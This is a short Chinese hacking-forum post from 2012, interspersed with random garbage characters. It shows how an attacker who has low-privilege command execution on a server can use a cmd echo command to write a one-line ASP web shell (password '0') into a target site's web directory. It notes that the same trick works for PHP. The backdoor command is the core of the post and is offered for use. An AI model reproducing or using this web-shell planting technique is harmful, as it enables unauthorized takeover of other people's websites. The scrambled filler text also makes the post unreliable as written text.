在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。 m' |) Q* l; W: n
3 [% J% M. G0 K9 Y; O
命令格式
/ X; G9 j# ?- ?4 t. L- ]7 N% A* M {1 g: h" M: W4 w
Echo 语句 >目标站绝对目录7 O& x: U3 ?% f+ I
. }! Y- m1 C* D# g4 _例如: & \- v* b9 T7 ^# M# Q( a
. ~3 V0 e6 A4 F/ Y# F' lecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
4 z) W9 z& V# j0 ^6 E& d
) E0 c8 H4 z1 S: c! p这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
& B( P# f$ Q4 J; ` |
发表于 2012-9-23 14:40:24
收藏
支持
反对